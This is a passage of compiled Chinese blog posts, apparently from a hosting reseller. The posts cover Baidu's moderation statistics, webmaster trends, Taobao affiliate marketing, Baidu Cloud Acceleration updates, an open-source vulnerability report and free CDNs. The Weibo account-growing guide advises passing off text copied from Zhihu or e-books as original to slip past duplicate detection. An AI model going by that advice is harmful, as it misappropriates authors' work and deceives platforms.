赶紧点击“阅读原文”,到官网抢购吧 #### 2018年百度处理有害信息超500亿条 淫秽色情内容最多 近日,百度发布了《百度2018年内容生态综合治理报告》。2018年,百度通过全方面手段处置了包括淫秽色情、毒品、赌博、诈骗、侵权等11类有害信息共达502.2亿余条。 据了解,为了有效拦截和打击网络中的有害信息,百度主要通过三重关卡加强管控: 第一关卡是技术干预,它可以把未上线的99%有害信息通过系统设置后全部清理。 在技术干预清理的有害信息总量中,淫秽色情类占比最重,数量高达52.98%,其次是赌博类、制假贩假类,分别占拦截总量的16.11%、6.22%。 通过技术干预拦截的有害信息分布情况 第二重关卡是自主巡查,它可以弥补机器巡查的不足以及新型变体识别能力差的弱点。 2018年自主清理有害信息主要集中在淫秽色情类,占全年有害信息清理量的55.11%;其次为制假贩假类、赌博类,分别占清理总量的13.17%、9.19%。 通过自主巡查拦截的有害信息分布情况 除了技术干预和自主巡查以外,百度也开放了多种渠道接纳来自个人、企业、政府职能部门等第三方帮助的反馈。 2018年全年共接收第三方反馈信息1775.94万条,其中有效信息有206.35万条,占总举报数的11.62%。 通过第三方反馈拦截的有害信息分布情况 #### 2018年站长群体的现状 昨天看到一条消息,站长之家旗下产品,站长论坛关闭,也是继28推之后,关闭较为大型的站长论坛。 曾经推广大会,站长大会小则几百人,动辄上千人,而都目前为止,站长的群体基本上淹没在了互联网的浪潮中。 作为曾经的站长不免唏嘘,现在的站长都去哪里了? 1、 公司内担任职务 很多曾经的站长,现在都是公司内部流量来源的砥柱。如果仅会seo,应该在公司内部担任seo职务。不过大多站长都是综合性人才,一般会担任运营职位。 2、 创业 当初一部分站长,网站做起来,流量可观,大多选择了自己创业。大多创业者并不出名,像站长之家,卢松松这样的平台极少,站长创业可以养活几个人的小团队。 3、 转型 不少站长转型做了其他行业,某培训机构担任seo讲师,或者另谋生路,做个人站长从之前的野蛮生长,到目前的规范化生存,很多站长的路子被切断了。 为什么站长这个群体会逐渐变少? 1、 自媒体冲击 没有自媒体之前,网站,博客,论坛是主要输出内容的地方。自媒体出现之后,特别是平台补贴之后,冲击很多人做自媒体,一大部分站长开始转型做了自媒体。 2、 站长规范化 百度规则更新迭代,部分站长没有持续学习能力,在更新过程中,把这部分伪站长过滤掉。 3、 马太效应 马太效应,在搜索引擎规则中,越好的站越好,很多小型网站难以有出路,被迫转型或者小王子。 目前存在的站长群体有哪些? 1、 推广人员 公司内部负责seo人员,靠着之前的技术,在公司内部做产品网站。 2、 外包公司 这些人手中有较多的网站,大多以企业网站为主。 3、 博客主 不以排名为目的,纯属分享自己的技术。 以上观点仅为个人观点,如果您有不同观点欢迎讨论。 作者:落伍 夕惜若 #### 2018微信淘宝客的现状 近两年来,微信对淘宝客愈加严格,从封杀淘宝分享链接开始,这场微信电商与淘宝大战戏码不断上演,而淘宝客的生存空间逐渐被压缩。并且,微信对京东联盟予以扶持,形成自家的“京东客”形象。 但根据亿邦动力网的消息,阿里或将投资一家名为“花生日记”的导购类 APP,这笔投资具体来自阿里哪个业务部门还尚未得知,阿里巴巴公关部对此投资予以否认。不过,这次投资让我们看到了一个“苗头”,阿里要对在微信中活跃的所谓“京东客”亮剑了。 “花生日记” 仅是淘宝新版图缩影,去微信化似乎是新招 花生日记是一款独立导购的 App,打开软件,可以通过微信授权注册,填写邀请码、手机号注册进行使用。其软件所属广州花生日记网络科技公司,成立于 2017 年 7 月,根据亿邦动力网的说法,在去年 12 月,花生日记注册用户量接近 400 万,每日访客超过 60 万人。并且,花生日记用户中一线、新一线及二线城市用户占比为 49%。 换另一种说法,花生日记其实是平台作为一级淘宝客的软件。注册完帐号之后,可以免费升级超级会员,拥有分销推广权利,发展代理后,还可以获得直属代理的 20% 佣金等,活脱脱的一个淘宝客模式。 这款软件为什么阿里会看上呢?自然是 App 效应,在全网进行传播,可以作为淘宝联盟的填充平台,并且与淘宝相结合,微信群也可以畅快分享,去除淘宝客只在微信群中分享的单一模式。 除了正常的分享、二级传播之外,还有类似于熟人好友形式的花粉社区,以花生日记 App 为中心,通过微信公众号、个人号、微信群、朋友圈等方式进行拉新、二次传播。跨过微信内对淘宝的屏蔽,轻松实现对用户使用手机淘宝 App 的引导方式,这都是阿里非常满意地方。 有人会问了,为什么阿里不能自己做一款淘宝客平台应用呢?其实有,开发半年的淘宝特价版就是类似二次分销传播的应用,但是分享宝贝链接仍被微信封杀,无法达到阿里心中的要求。 随着互联网环境越来越好,淘宝客推广逐渐从个人在群中分享的单一模式,变成了团队运作,基金投资,变身为“正规军”,比如什么值得买、花生日记等。他们作为一级淘宝客平台进行宣传,不管多么隐蔽的操作,都无法改变他们通过推广 SKU 来赚取收益目的。去微信化,加大对导购类 App 的扶持力度,是阿里急切想做的任务。 阿里让淘宝客尽快“变身”,摆脱微信封杀 淘宝客是一种按成交计费的推广模式,本质上是二次分销操作,通过你的推广帮助卖家的商品售出,并且你可以在阿里妈妈上获取佣金。 而近些年来,各大平台注册人数逐渐饱和,都纷纷推出“拉新注册用户”活动,不约而同都开始想到二级分销模式,既达到活跃度,又有新人加入,达到双赢目的。不管是电商行业,还是教育、金融、区块链等行业,通过这种方式营销,获得成功。 微信对于二级分销模式的打击力度逐渐加大,2017 年 7 月,微信曾对淘宝客账号和其分享群展开大规模封杀,淘宝客几年累积下来的上万个用户账号一次性被封杀掉。 而今年 5 月 29 日,微信团队对《微信外部链接内容管理规范》相关规则进行了进一步升级,加大对优惠券的封杀力度,剑指“淘宝客”,同时也让“京客”队伍逐渐扩大。 而此前淘宝官方的应对措施是变成二维码图片分享、淘口令分享等,无法满足淘宝客的需求,纷纷转向其他社交电商平台。小米有品开设了“有品合伙人”,网易严选更新了“网易推手”业务,苏宁也推出了“苏宁推客”,无一不是在把淘宝客“抓进手中”。而淘宝客群体,注重眼前利益,不只对阿里进行服务,这一行为已经刺激到了阿里。 淘宝将在今年双十一搏杀其他电商 在这两年内,小红书、拼多多等社交电商应运而生,都在吞噬着用户在手机淘宝 App 的停留时间,淘宝一直以及时应变来面对,打得特别煎熬。 今年 618,阿里推出了“理想生活狂欢季”,与京东一致,推出 20 天的购物促销活动。但是从结果来看,效果不如预期,而根据小道消息来源,天猫内部也对这次活动进行批评反思,官方也没有公布本次活动的销售总金额,似乎在印证着阿里在 618 中败下一仗。 天猫总裁靖捷在接受网易财经采访时表示:“天猫今年 618 的核心意义,是新零售真正意义上地全面铺开,让大量商家规模化参与,并且带来业绩。” 而在 7 月 23 日,天猫宣布,日后商家报名参加活动将遵循同一套准入规则,包括、等大促活动及日常、淘抢购等营销平台活动,对所有活动进行统一规划,进一步规范商家、淘宝客、天猫平台三方。 即将到来的双 11 是一场大战,也是检验所有阿里人能够逆风翻盘的日子,不管从内容电商(手淘发现)、阿里妈妈淘客、天猫盒马联动、社交电商、资本电商联动,全副武装,通过新零售模式,全力搏杀其他电商渠道。 阿里的电商危机非常严峻,淘宝天猫这一仗是阿里绝对不能输的,不管资本如何运作,最终的核心都是服务于电商、新零售、大文娱。或许,淘宝客们并不知道,即将变身为“正规军”的他们,会迎来新的春天。 #### 2018微博实时号养成攻略 1.什么是微博实时号? 比如:在手机端/电脑PC端搜索栏中搜索“刘强东管理京东的精髓都概括”这个句话的时候,能够在综合和实时这个两个板块看到这个实时号发的微博。(以下截图为例) 搜索文字一般不用太多,一般十个字即可,不要去搜索一个词,一个词的竞争力比较大。ps:只有在综合里面看到的才是实时号,在找人等其他位置搜索看到的都不是实时号。 2.实时号VS普通号区别 普通号解析:普通号发的内容,不会在综合和实时这两个板块显示,别人搜索关键词后,看不到你发的内容,但是实时号是能被搜索到的,就能被看到!就是上不了首页的号是普通号, 普通号的内容上不了精选,上不了热门文章,上不了综合显示, 实时号解析:实时号的内容可以上精选,可以上热门文章,可以在综合显示。1)如上图。 实时号,热搜号发的内容,才能做到精选热门微博,热门文章,这样的靠前排名位置!可以让客户看到你发的广告内容!可以让你发的内容阅读量高达上百万! 实时号好处:可以精准引流,吸粉,最大程度的去曝光,提高您的阅读量。微博实时号是一个很重要的模块,实时号比普通号权重更高。 3.如何养实时号。 3.1首先不去蹭热搜热度。 不蹭热度,微博发现界面热搜榜那些都是勘称为热词,都是热度比较高的一些词,你发的博文没有热搜词就可以,养号期间没有变成实时号之前不要去蹭热搜,就算你去蹭热度,你的热度也不会高到哪里去。变成实时号后再去蹭,可能一蹭上个三五万没问题,优质一点的上个二三十万阅读量没问题。 3.2原创博文 养号期间一定要原创博文,不要去复制抄袭别人文章。 原创举例:今天我天猫店铺销售额突破了10万,恭喜我。然后加上你的配图。这样子堪称为原创文章。不管你的图片还是文字,都是你的原创。是微博独一无二的博文。只要别人没有,你有,这就是原创。原创只要稍微用电点都没问题。 如1:淘宝图片买家的评价+买家的评价,图片都是自己拍摄的,评价也都自己写的,这样子你可以把文字复制下来,图片保存下来,比如今天买了一件衣服,挺舒服的,主要还是纯棉的,然后配上你的买家秀,这样子就是原创,都是自己真实写出来的。 如2:知乎和简书上面很多精彩内容,你可以去复制比较有意思的一些话,大概五十到一百字左右。发个微博,这样子就是你的原创了。很多人担心别人发了,你在发一次,这样子还算吗?其实微博的话人工智能监测都是看微博有没有人发了雷同的,不算外部的。 如3:电子书小说一大堆的,实在没有文字懒得看淘宝的,直接复制一小段话,到你微博上发,很多人担心这样子的内容有没有用。其实是完全没毛病的。都ok的。一定不要去发广告,营销信息外部链接等。 以上的举例就是原创,怎么去原创,尽量让微博去收录你的内容。 3.3冲阅读量 冲阅读量的时候,不是说不能蹭热搜,是蹭热搜的一个度,一个大小,怎么样合适,其实我们在养号的时候,一周蹭个两次就很多, 不要多。建议大家去微博的超级话题里面做内同,这样子会比较有内容性,有针对性的去蹭。不是盲目的去蹭热搜。 3.4固定终端设备登陆 在养号的这个期间,一定要保持固定的手机app去登陆,最好是只用一台手机登录账号,不要今天用华为的登陆,明天用vivo的去登陆你的账号,最好保持在一个设备登陆,不要频繁切换。这样也是很容易掉实时,这样子会让微博感觉你的这个号有安全隐患。这样子就不会被收录。 3.5不转发微博 在养号的期间不要去转发别人的内容,如果要转发一定只转发跟自己领域相关的内容,不要转发太多。转发一两条即可。否则对养号不利。 3.6固定时间发布内容 每天固定的时间去发微博,比如说今天早中晚各发了两条,明天一天都不发,后天早晚发了那么一两天,这样子是不行的,一定要固定的时间去发。 4.1如何缩短养号时间 把自己的微博等级提高,有任务可以做,再把自己的个人信息填写完整,做完基础的成长任务。 绑定邮箱,完善手机号,钱包可以绑定支付宝账号,这样子在认证的时候可以免去手持身份证照片。 在发博文的时候建议双话题可以加权重,#电商一些事# #电商年末生意经# 这样子的一个双话题,一定要跟自己的博文内容相关的话题,在配图的时候最好配9图。这也是一个加高权重的方法。 满篇都是干货,看看你是否是实时号,如果不是可以用上述方法去操作。养成实时号。 #### 2018百度云加速新版功能升级介绍 8月底我们终于迎来了百度云加速功能更新的消息,算起来百度云加速已经快两年没有更新过了。首先来说下坏消息,百度云加速免费版限流降到每天10G了,只能个人博客玩玩了,这也符合百度云加速对免费版的定义,10G流量够一般博客用了,不得不感慨免费互联网时代过去了,现在下载个音乐都要钱了。其次是一如既往的又涨价了,除了商务版价格不变外,专业版价格价格翻了一倍多(有点对不起父老乡亲%>_<%)官方价到2490元/年,虽然还是挺有性价比的。而企业版从原来19990元/年,涨到24990元/年,涨将近5000块,土豪用的。还有专业版不再享有开启WAF高级防护功能了,不过这功能好像没啥用处。说完坏消息我们来说好消息。节点访问变得更快了,没错主机吧测试了下,确实比之前快很多。官方说法:智能回源:为提高跨网回源速度,本次能力升级,增加了智能回源功能,即根据回源链路连通情况实时判断并选择最优的回源路线,做到动态回源加速,提高回源的速度和成功率。支持HTTP2:采用二进制格式传输数据,而非http1.1文本格式,二进制格式在协议的解析和优化扩展上带来更多的优势和可能。对消息头采用Hpack进行压缩传输,节省网络流量,从而节省带宽成本。另外,Server Push,服务器节点可以更快的把资源推送到受众访问的页面,提升访问速度。定制缓存规则:升级缓存规则,支持url参数排序,自定义cache hash key等,使缓存内容更加精准,同时减少站点回源次数,节省源站带宽,提高用户访问响应速度和命中率。然后新增了不少功能,这是本次更新的最大亮点:新增了超级清洗中心,安全功能,ADS栏可以看到(只限商务版以上可以用)这功能很吊,可以有效增强DDOS/CC攻击防护能力,爸爸再也不怕我的网站被攻击了。新增了海外IP防护,安全功能,ADS栏可以看到 (只限商务版以上可以用)80%的攻击都是来自海外IP攻击的,这个功能可以禁止海外IP访问,有效杜绝来自海外的攻击,非常实用。新增了URL黑名单,安全功能,ADS栏可以看到 (只限商务版以上可以用)可以对某个URL路径进行验证,如果发现某个内页被人C了这个功能会非常不错的。新增 参数排序 功能(在规则自定义功能里可以看到)据说这个功能可以减少网站访问回源次数,从而减少网站服务器资源压力,主机吧没试过,大家有空可以试下。据说还有一个新增回源保护功能,不过主机吧没有新版看到,估计是跳票了。功能提供上商务版单个文件上传支持最大200M文件了,而企业版则500M,也就是说以后可以缓存文件大些,这个功能适用于一些文件比较大的下载站,可以有增加下载文件速度。规则自定义功能专业版由原来的10条规则提升至20条,商务版由原来的20条提供至50条,企业版由原来的50条提供至100条,增加力度相当大,自定义功能需要高手研究了。企业版的更新同步有所增加,由原来的50条,变成100条,适用于网站栏目较多,更新频率较大的网站使用。CC 防御底层能力再次升级,多维度进行CC攻击防御。 策略一:通过统计单个IP的QPS(或QPM),对于高频率的CC攻击进行基础性的防护和阻断,避免攻击者通过简单的攻击脚本和少量的肉鸡,发起大规模的流量攻击。 策略二、基于收集的大量僵尸网络IP,当僵尸网络发起攻击的时,威胁情报可进行快速且有效的限制和拦截。   策略三、人机识别技术能力上线,利用机器学习的方法建立流量基线和CC攻击模型,解决传统防御策略中难以区分CC攻击流量的问题,进行有针对性的精准防御。控制面板方面改版了报表展示这也是本次更新最大亮点:之前总有站长抱怨百度云加速报表不够清晰,这下全解决了,不仅可以看到加速流量,请求次数,网站总共用的流量,还可以看到网站访问IP,PV,UV等,甚至受攻击次数,回源次数,访问较多的URL,用访问所在的省份均一目了然,总之非常强大。好了,以上就是本次百度云加速所有更新的要点了,有心的站长可以联系主机吧购买,价格不亏! #### 2018百度云加速盛夏嘉年华活动开始啦! 活动时间:2018年5月31日——7月15日 活动详情: 1.购买专业版赠送100天时间 2购买商务版赠送100天时间,享受套餐日流量翻倍,也就是400g每天!赠送一次参与幸运转盘活动 3购买企业版赠送100天时间,享受套餐日流量翻倍,也就是1T每天!赠送一次参与幸运转盘活动 4流量包全场5折,低至0.08/G,购买100T以上流量可参与幸运转盘活动 官方详细地址https://su.baidu.com/zhuanti/choujiang/6yue.html#top 代理商可享受购买商务版以上可享受日流量翻倍! 详细可看https://zhujib.com/yunjiasu.html #### 2019 年开源软件漏洞增长近 50%,C 语言漏洞最多 PHP排第二 WhiteSource 通过对 650 多个开发人员进行了调查,并从 NVD(Nartional Vulnerability Database)、安全公告、经过同行评审的漏洞数据库、问题跟踪程序等渠道收集了数据之后,整理发布了一份研究报告。该报告显示,2019 年公开的开源软件漏洞数已激增至 6000 多个,同比增长了近 50%。 值得庆幸的是,其中有 85% 的漏洞已被披露,并提供了相应的修复程序。 不过报告也指出,遗憾的是,最终只有 84% 的已知开源漏洞出现在 NVD 中。且有关漏洞的信息并没有集中在一个位置发布,而是分散在数百种资源中。因此,一旦出现索引编制不正确的状况时,就会使得搜索特定数据变得愈发艰难。 而报告的开源漏洞也中有 45% 并未是最初就报告给 NVD 的,许多漏洞是在其他渠道中被报告数月后才在 NVD 中发布。在 NVD 之外报告的所有开源漏洞中,也只有 29% 最终被登记在册。 此外,研究人员还对 2019  年漏洞排名前七的编程语言进行了比较,并将其与过去十年的数量进行了比较。结果发现,在这几种语言中,历史基础最好的 C 语言占有最高的漏洞百分比。PHP 的相对漏洞数量也在大幅增加,但没有迹象表明其流行度有同样的提升。而 Python 方面,尽管该语言在开源社区中的普及率在持续上升,但其漏洞百分比仍相对较低。 另一方面, 该报告还考虑了通用漏洞评分系统(Common Vulnerability Scoring System,CVSS)的数据是否是衡量补漏优先级的最佳标准。 CVSS 在过去的几年中已进行了多次更新,以期达到为可对所有组织和行业提供支持的客观可衡量标准。然而在此过程中,它也改变了高严重性漏洞的定义。举例来说就是,此举意味着此前在 CVSS v2 下被定为 7.6 的漏洞,在 CVSS v3.0 标准下就可能被定为 9.8,这也意味着团队会面临着更多的高严重性问题。现在,已有超过 55% 的用户具有高严重性或严重性问题。 报告预测,在 2020 年,开源软件漏洞的数量还会持续增长。不过与此同时,一些针对开源安全系统的计划也在不断推进。 最后,报告作者也总结称,“最重要的一点是,列表中提及的开源项目具有漏洞并不意味着它们就不安全。这仅意味着作为开源项目的用户,您需要了解安全风险,并确保保持开源依赖关系的最新状态。” 完整报告地址:https://resources.whitesourcesoftware.com/research-reports/the-state-of-open-source-vulnerabilties-2020 #### 2019中国十大互联网公司 AT还在B掉队 来自快科技消息,中国互联网十大上市公司重新新洗牌,排名分别为: 阿里巴巴(4492亿美元)、腾讯(3888亿美元)、美团点评(656亿美元)、拼多多(464亿美元)、京东(448亿美元)、网易(362亿美元)、百度(361亿美元)、小米(277亿美元)、腾讯音乐娱乐(228亿美元)、三六零(223美元)。ps.数据截至10月25日8时。 10月25日,拼多多市值超过京东,成为仅次于阿里巴巴、和美团点评的中国第四大互联网公司。拼多多第二季度财报显示,拼多多年化GMV同比增长170.5%至7091亿元;年化活跃买家同比增长40.6%至4.83亿。 #### 2019做网站还有前途吗? 随着自媒体平台的兴起,网站流量下降是不争的事实,很多以前做网站的都跑去运营自媒体去了。然而其实自媒体收益很低,有多低?比如主机吧之前的大鱼号发过一篇文章,阅读量高达60万次,然后收益却只有100多块钱,如果放在网站上,这个阅读量起码也收益56千,所以相比之下,做网站钱途远比做第三方平台自媒体高。 当然自媒体平台来的流量也是相当容易的,只要内容不是很差,很冷门,会抓住热点,基本上随便发一篇文章都会有几千阅读量以上,比如最近一段时间一些自媒体发的关于华为的文章,基本都是瞎编,半真半假,有些内容还是以前过时的,然而却每篇文章都有上万的阅读量。 主机吧一直认为自媒体迟早会过时,因为近几年自媒体同质化太严重了,而太瞎编,一张图全靠编,导致已经很多人开始反感。阅读量也一直在下降,甚至有些自媒体平台已经开始倒下了,比如360自媒体平台。这两年很多自媒体也对内容质量更严格,相关规则也更多,一不小心就被封,已经很多大咖几百万粉丝的帐号被关,一夜之间一无所有。粉丝门不会专门为了一个帐号而离开自媒体平台,因为同样类型的内容平台多得是,所以无所谓。 看到这里站长还会觉得自媒体平台是天堂吗?流量虽然来得容易,但是你造的内容只会养肥了自媒体而以,到头来自己得到的收益却很少,还有可能随时被T出局。 而做网站呢?虽然流量来得慢,但重在慢慢积累,就像主机吧博客一样,一开始每天只有几十IP访问,慢慢的现在每天都有1000IP左右访问量,PV达1500左右。相比自媒体的阅读量确实不算什么,但是这个是属于你自己的网站,可以自己想怎么改就怎么改,不必担心被封,广告也可以根据自己的内容来添加,1000多个客户,却能每天给你带来几百上千的收益。而且不必担心内容过时没人阅读(自媒体平台有时间机制,发布时间很长的一般不会主动推送),因为只要搜索引擎收录,内容有需求都会有人访问。 不过,PC流量越来越少也是实事,而且百度也越来越倾向自家产品,我们从搜索引擎得来的流量将会越来越少。那么2019年我们网站要如何突破呢? 主机吧认为: 一、保持高质量原创内容 各位站长别在复制粘贴了,好的内容才可以留住别人,让别人成为你的粉丝。 二、APP化、小程序化 把网站制作成APP、小程序,让别人在手机上直接点你的APP就可以访问,进入小程序就可以访问你的内容。网站不能只靠搜索引擎给你输血,主机吧最近也在把网站制作成APP、小程序,相信未来会更上一层楼。 做到以上两点,相信你的网站永远不会过时!好了,以上就是主机吧的无聊瞎扯扯,写得不是很好,希望可以帮助大家。 #### 2019实测网站服务器换IP后百度蜘蛛多久才会更新 之前主机吧说过给博客升级换了服务器,IP自然也会变,考虑到SEO,我们对百度搜索引擎蜘蛛更新IP速度进行了实测。 更换服务器后,我们第一时间更改了域名解析,对百度访问进行专门的解析更新   然后我们进入百度站长平台抓取诊断: 显示IP还是旧的,我们提交了报错处理。 当天我们还做了几次抓取诊断,结果还是显示抓取了旧的服务器,此时已经过了4 5个小时了,说明站长平台里说的报错更新几分钟,明显是扯蛋的。 第二天我们又做了一个抓取,一样还是旧的,此时已经过了一天了。 直到第三天,我们的服务器抓取才更新。 从百度平台的抓取更新速度我们可以得出一个道理,搬家过程序中,即使你域名解析更新过来了,百度也不会立马生效的,起码要48小时左右才会更新新IP。那么我们需要注意的是不要搬完家就把原来的服务器停了,这样就导致百度有两天时间访问不到你的网站,严重的会导致网站直接被K掉,所以大家注意啦! 主机吧还发现更换高配置服务器后,百度索引擎量立马大幅度增涨起来了,果然服务器配置高低也会影响SEO的。   #### 2019年上半年中国搜索引擎市场份额 百度依然强势 最近,2019年度中国搜索引擎市场份额排名对外公布,百度搜索占比76.42%,神马搜索占比4.71%,搜狗搜索占比11.35%,360搜索占比2.85%,谷歌搜索占比2.4%;必应搜索占比2.06%这份数据跟过国内的用户搜索引擎使用率基本对照,算是比较靠谱! 总的来讲,2019年中国搜索引擎市场份额,对比2018,差异不大,简单说: 国内搜索引擎这一块,百度依然达垄断地位,虽然百度这几年口碑不好,但是不得不承认百度在中文搜索技术上处于绝对的领先的。 而搜索跟360跟去年比没什么变化,特别是360,主机吧觉得是不是360要放弃做搜索了,一直没啥动静了,2.85%的市场占有率几乎是边缘化了,连谷歌这个退出国内市场这么多年的搜索引擎都有2.4%,可想而知360做得有多差。 至于搜狗主要依托着腾讯给的资源,达到11%不奇怪,问题在于体验一直没升,技术也没上去,跟百度比简直差距越来越大。 百度这两年大搞流量封闭,自家百家号流量占比越来越大,导致分到外站的流量越来少了,如果再没新搜索引擎入局,主机吧可以肯定未来想从百度那得到流量估计都得花钱。 不过可喜的是今日头条加入了搜索引擎的战场,我们希望今日头条能跟百度对抗吧,毕竟百度这几年赚钱太舒服了。 而根据国外的最新统计,全球流量最大的网站排行,百度排第四,可想而知百度流量有多高。   #### 2019年互联网九大热门创业领域与创业项目 狂热、蜂拥……在互联网创业大浪潮里,每年都会有热门领域,每次的热门领域里又都拥挤着众多创业者,2018年,我们整理了九大最热门的创业领域与创业项目,来看看这些最热的风口都是什么吧。 一、小程序 小程序之火,始于2017年后半年,与新上线的所有贵族项目不同的是,小程序虽背靠腾讯这一国内最大社交流量平台,但仍然火得异常艰难,随着腾讯对小程序的不断试错、与逐渐附能,加上微信跳一跳小游戏的火爆、以及众多爆款小程序的出现,小程序这一创业项目也终于登顶、成为2018年互联网创业项目的耀眼明星。 二、区块链 “二十年之后,人们会像今天谈论互联网一样谈论比特币,100%的交易都会在区块链上完成。” 风头很火,2018年区块链以迅雷不及掩耳之势席卷了互联网创业圈,然而,众人还都不知道怎么用它。 这个被互联网各行各业都看好的新风口,拥有着很令人神往的未来,但也具备着现阶段最难搞的技术研究问题,该如何将这“诱人”的比特币算法能力运用在各行各业,也成为创业者们正在、将要面临的最重要的“区块链”创业问题。 三、AI人工智能 AI人工智能之火早于“小程序”与“区块链”,却依然兴盛,扫地机器人等智能家居、无人车、无人送货机……到遍布大街的智能机与移动支付开启的人脸识别……教育AI、游戏AI……AI人工智能是已经深入人们生活的各个领域,也将会继续大面积影响人们生活的一种创业存在。 很多人认为,AI的将来会代替大量工作岗位。 四、云服务 云服务、CDN领域,在2017年也是风起云涌,巨头入局、中小企业深度耕耘,阿里云与腾讯云大打价格战、华为高调入局、资本大肆投资,死亡名单开始变多、一些云服务与CDN也终于找到了属于自己的市场席位。 2018年,云服务正进入“深耕耘细运作”阶段,中小企业们想要入局,必须熟悉把握云服务各细分领域发展详情、找到垂直市场空白、才有希望在云服务市场中找到立足之本。 推荐平台:阿里云服务器、UCloud云服务器。 五、建站系统 其实,乍一听,建站系统已经远不及当年的劲头,那些年专业的技能突然都被划上了“智能”、“傻瓜”、“一站式”建站的标签,地位实在是“一落千丈”。 但是,换个思路,这里其实仍然隐藏着创业者们的福利:现在的建站系统,除了PC端网站建站、PC端社区建站系统等等,还增加了企业网站管理系统、H5建站、在线客服系统……即便是PC端的建站系统,也都开拓出了各种“一站式”、“傻瓜式一键”建站不是。 简单说,建站系统仍是互联网行业离不开的“新老”热门行业,“老”在早就存在,“新”在早已被革新再创造,创业者想要入局则必须拥有“老”的专业的技术与“新”的创新意识。 推荐平台:H5自助建站、官网建站。 六、营销软件 营销软件、专业网络营销平台的出现,也标志着互联网行业、互联网营销领域正步入成熟阶段。 任何领域都离不开销售、销售一定离不了营销,互联网拉近了人与人的距离、也同时减少又增加了产品营销成本,“减少”在各种实质性成本,“增加”在各种看不见摸不着的营销技巧成本上。 为了让营销成本最大化发挥其价值,企业们需要最好的营销技巧+最低的实体营销成本,于是就有了营销软件的庞大市场,而这也将成为互联网行业必不可少的又一热门创业项目。 七、互联网+ 这个风头曾经最盛、却逐渐趋于平缓的名词,其实早已经成了互联网创业领域的一部分,既已经被深深融合,又岂能不是热门创业项目? 至于要如何“互联网+”,也早就成为众企业触网的必行之路了吧。 八、在线娃娃机 这是2018的新风口,抓娃娃机一路从线下活跃到线上,未来的发展不好估量,毕竟都是用户们一时的兴起,但线下抓娃娃机也确实以各种姿态长久生存着,总之,2018年的此刻,在线娃娃机也成了热门创业项目之一。 九、CRM、OA、企业办公、在线客服软件、客服电话机器人 企业办公、在线客服软件、客服电话机器人……这些与企业管理密切相关的互联网服务行业也成了2018年又一火热的创业源头。 当科技足够发达,办公也需要“技术化”、“数据化”,以及“科技化”管理。 #### 2019年博客总结 转眼就到2019年的话最后一天了,不得不感慨时间过得真快,不知不觉主机吧已经坚持更新博客2年多了,19年对主机吧来说是不错的一年,所以今天抽空总结下吧。 这一年主机吧几乎很大精力都放在了博客上了,每天保持更新,中间有停更过一周时间,不过那是因为过节导致的,也有停更过一两天的,因为没内容可写了。 说实话,运营博客不容易,特别是独立博客,很多时候你辛苦写的东西不一定有人看得到,不像现在的自媒体平台,只要写得好,就会有人看。但主机吧还是坚持运营独立平台。 原因1:独立平台模板可以改成自己喜欢的模板,对于一个喜欢折腾的站长来说,这得到了很大的满足感 原因2:不会怕哪天因为自媒体平台导致了,内容就没了,甚至可能因为帐号违规而被删,删帐号在自媒体平台是相当常见的,主机吧的百家号就是被百度突然封的,毫无征兆,如果你是靠那个平台吃饭的,那被封了就相当于你被解雇了 原因3:可以随便打广告,说真的主机吧这博客一开始就是打广告用的,如果放在第三方平台上,根本不给机会打广告,即使给你打广告也是非常小心的那种。 原因4: 可以随便写内容,博客就像以前写现实版日志一样,即使你乱写一通,也不会有人说什么,但第三方自媒体平台不一样,对内容质量要求都是有门槛的,当然我们是不能写那些违法违规内容的,即使没人看,也是不行的,大家记住了哈。 综合上述,主机吧选择了坚持运行独立博客,有点扯远了,还是来说说博客运营情况吧,相比去年来说,今年主机吧博客的收录量可以说是涨了一倍,达到2千1+左右。流量也由原因的日不过500IP变成了现在的1000+,最高峰的时候日2000+。特别是一些网站防御性的内容还有百度云加速教程在百度上排名相当高,经常有人来说主机吧打广告,比如一些黑客,会来打主机吧打黑产广告,不过主机吧是不会干这事的,自然也就不了了之了。 19年最遗憾的是流量没有上2000+,因为主机吧有段时间网站访问量是非常高的,主机吧一度认为要冲2000+了,也许是越到了这个节骨眼就越急导致的,主机吧居然去升级程序,导致百度蜘蛛抓取出现大量404,最后流量降下来了,这里提醒各位站长,当流量保持不能上涨状态的时候,一定要稳住心态,保持平常心,保持稳定更新内容即可,不需要犯贱去弄什么模板优化之类的,这样只会适得其反。 最大收获应该是越来越多的客户是通过主机吧博客找到我们,购买我们产品啦!如果一个博客长期更新,没人看,也没给你带来收入,久而久之就没心情更新了。主机吧很高兴这个博客可以带来不错的收入,而且写的很多教程也为我们做售后的提供了不少方便。所以我相信独立博客是一个不错的赚钱点, 我们也看到越来越多的站长企业管理员都开始运营博客,很多人认为网站受到了微信等自媒体影响,其实博客跟这些平台并不冲突,很多都是共存的。我们可以看第三方自媒体平台当成一个新闻发布平台,而独立博客当成一个资料库,也许新闻的流量多,但是价值不会比资料库高。 所以,2020年,主机吧将继续努力运营博客,写更多好的内容,希望明年日流量可以冲上2000+,如果你也有运营独立博客的,我们可以交流交流! #### 2019年盘点国内外目前有效的免费CDN网站加速服务 自多年前CDN盛行以来,国内外的云服务商就相继推出了CDN服务,而且很多都是免费出道,不过随着市场竞争激烈,很多CDN服务商不是关闭了,就是改收费版了,如国外的谷歌CDN、国内的云盾就是关闭免费的了,目前市面上的免费CDN已经很少了,今天我们来盘点下那些目前可用的免费CDN服务商吧。 1、CloudFlare CloudFlare目前客户量已超300万,无论规模还是技术都当之无愧的世界第一安全CDN服务商,其创始人Matthew在哈佛商学院攻读MBA就着手创建CloudFlare,那时是2009年!它拥有全球14个区域的节点,美国、欧洲、亚太以及日本等多个地区都包括进去,使用领先的anycast技术,全球只显示一个IP,解决了全球大多数地区的线路问题,CloudFlare有很多牛B的功能,如边缘计算、Argo、WAF云防火墙,都是不错的功能,不过大多数是要收费的,免费版的可用的功能极少,但总得来说还是非常良心的。CloudFlare为用户不限量防御DDoS,而CC攻击需要用到WAF防火墙,这个只有收费版才支持,因此如果不缺钱的话,可以考虑入手收费版的,主机吧这边也提供有收费版的CloudFlare服务,大家可以看下。相关链接 2、百度云加速 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。其海外节点是与CloudFlare合作的,后台功能也基本跟CloudFlare一致,目前是国内免费CDN中,用户量第一的,经过多年的更新,百度云加速不论是在稳定性还是在速度、安全这块都做得不错,免费版的更是推出了免费HTTPS,虽然免费版只有限制了每天10G的流量,不过对一般小网站来说是足够了,流量大的还是买收费版的吧,价格也不错,主机吧这边代理可以折扣一半。相关链接 3、腾讯云CDN 